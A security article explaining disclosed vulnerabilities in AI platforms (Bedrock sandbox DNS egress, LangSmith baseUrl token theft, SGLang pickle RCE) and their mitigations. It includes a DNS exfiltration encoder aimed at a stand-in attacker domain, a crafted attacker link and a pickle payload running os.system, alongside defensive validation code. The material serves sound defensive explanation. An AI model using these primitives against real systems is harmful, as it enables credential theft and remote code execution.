AI Platforms Under Siege: DNS Tunnels, Token Theft, and Pickle RCE

Artificial intelligence platforms are rapidly becoming the backbone of enterprise innovation, but recent disclosures show they are also emerging attack surfaces. Researchers have uncovered flaws in Amazon Bedrock AgentCore Code Interpreter, LangSmith, and SGLang that enable data exfiltration, account takeover, and remote code execution (RCE).

Amazon Bedrock: DNS as a Backdoor

  • Issue: Sandbox mode permits outbound DNS queries despite “no network access” configuration.
  • Impact: Attackers can establish command‑and‑control channels, exfiltrate data, and even obtain reverse shells.
  • Risk multiplier: Overprivileged IAM roles could expose sensitive AWS resources like S3 buckets.
  • Mitigation: Migrate workloads to VPC mode, enforce DNS firewalls, and audit IAM roles for least privilege.
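To see why permitted DNS resolution defeats a “no network access” guarantee, consider a minimal sketch of DNS-based exfiltration: arbitrary data can be encoded into hostname labels, and every lookup of those names delivers a chunk to whoever runs the authoritative nameserver. The domain and function below are illustrative placeholders, not taken from the disclosure.

```python
# Sketch: smuggling data through DNS queries. An attacker-controlled
# nameserver for "attacker.example" (placeholder) logs every lookup,
# so each query carries a chunk of the secret off-host.
import base64

def encode_for_dns(secret: bytes, domain: str = "attacker.example") -> list[str]:
    """Split a secret into DNS-safe labels (max 63 chars each) and
    build the hostnames a tunneling client would resolve."""
    payload = base64.b32encode(secret).decode().rstrip("=").lower()
    chunks = [payload[i:i + 63] for i in range(0, len(payload), 63)]
    # Prefix each chunk with an index so the receiver can reassemble in order.
    return [f"{i}.{chunk}.{domain}" for i, chunk in enumerate(chunks)]

names = encode_for_dns(b"AWS_SECRET_ACCESS_KEY=example")
```

A sandbox that resolves these names, even with all other egress blocked, has an outbound channel; this is the mechanism a DNS firewall or VPC-confined resolver is meant to cut off.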

LangSmith: URL Injection and Token Theft

  • CVE‑2026‑25750 (CVSS 8.5): Lack of validation on the baseUrl parameter allowed attackers to steal bearer tokens, user IDs, and workspace IDs.
  • Attack vector: Social engineering via crafted links (e.g., ?baseUrl=https://attacker-server.com).
  • Impact: Unauthorized access to trace history, SQL queries, CRM records, and proprietary code.
  • Mitigation: Upgrade to LangSmith v0.12.71, validate URL parameters, and train users against link‑based social engineering.
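The underlying fix is straightforward allowlist validation: never send credentials to whatever host a user-supplied baseUrl names. A minimal sketch of such a check, assuming the legitimate API lives at api.smith.langchain.com (the function and allowlist here are illustrative, not LangSmith’s actual code):

```python
# Sketch: reject a user-supplied baseUrl unless it targets a known host
# over HTTPS, so bearer tokens are never sent to an attacker's server.
from urllib.parse import urlparse

ALLOWED_HOSTS = {"api.smith.langchain.com"}  # hypothetical allowlist

def validate_base_url(base_url: str) -> str:
    parsed = urlparse(base_url)
    if parsed.scheme != "https":
        raise ValueError(f"refusing non-HTTPS baseUrl: {base_url!r}")
    if parsed.hostname not in ALLOWED_HOSTS:
        raise ValueError(f"refusing unlisted host: {parsed.hostname!r}")
    return base_url
```

With this check in place, a crafted link like ?baseUrl=https://attacker-server.com fails before any authenticated request is made.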

SGLang: Pickle Deserialization RCE

  • CVE‑2026‑3059 & CVE‑2026‑3060 (CVSS 9.8): Unauthenticated RCE via ZeroMQ broker and disaggregation module using unsafe pickle.loads().
  • CVE‑2026‑3989 (CVSS 7.8): Insecure deserialization in crash dump replay utility.
  • Impact: Attackers can send malicious pickle files to trigger arbitrary code execution.
  • Mitigation: Restrict access to service interfaces, segment networks, and monitor for abnormal child processes or outbound connections.
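The danger is inherent to pickle: deserialization can invoke arbitrary callables via __reduce__. The sketch below shows both the attack primitive and one common defensive pattern, a restricted unpickler that rejects unexpected globals. The class names are illustrative; SGLang’s actual patches may take a different approach.

```python
# Sketch: why pickle.loads() on untrusted bytes is RCE, plus a
# restricted unpickler that blocks dangerous globals.
import io
import pickle

class Exploit:
    def __reduce__(self):
        # If loaded with plain pickle.loads(), this runs os.system("id"):
        # arbitrary command execution on the deserializing host.
        import os
        return (os.system, ("id",))

malicious = pickle.dumps(Exploit())

class RestrictedUnpickler(pickle.Unpickler):
    # Only plain container types may be reconstructed; everything else fails.
    ALLOWED = {("builtins", "dict"), ("builtins", "list")}

    def find_class(self, module, name):
        if (module, name) not in self.ALLOWED:
            raise pickle.UnpicklingError(f"blocked global: {module}.{name}")
        return super().find_class(module, name)

def safe_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()
```

Even so, the Python documentation is blunt that pickle is not safe for untrusted input; restricting which interfaces can reach the deserializer at all, as the mitigation above recommends, remains the primary defense.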

Strategic Takeaways

  • AI sandboxes aren’t immune: DNS resolution can undermine isolation guarantees.
  • Observability platforms are critical infrastructure: LangSmith shows how developer‑friendly flexibility can bypass guardrails.
  • Open‑source frameworks need scrutiny: SGLang’s unsafe deserialization highlights the risks of rapid innovation without secure defaults.

Final Thought

These disclosures underscore a new reality: AI platforms are not just tools; they are attack surfaces. As enterprises embed AI deeper into workflows, defenders must treat them with the same rigor as traditional infrastructure — enforcing least privilege, validating inputs, and monitoring for anomalous behavior. The future of AI security will hinge on balancing innovation with resilience.
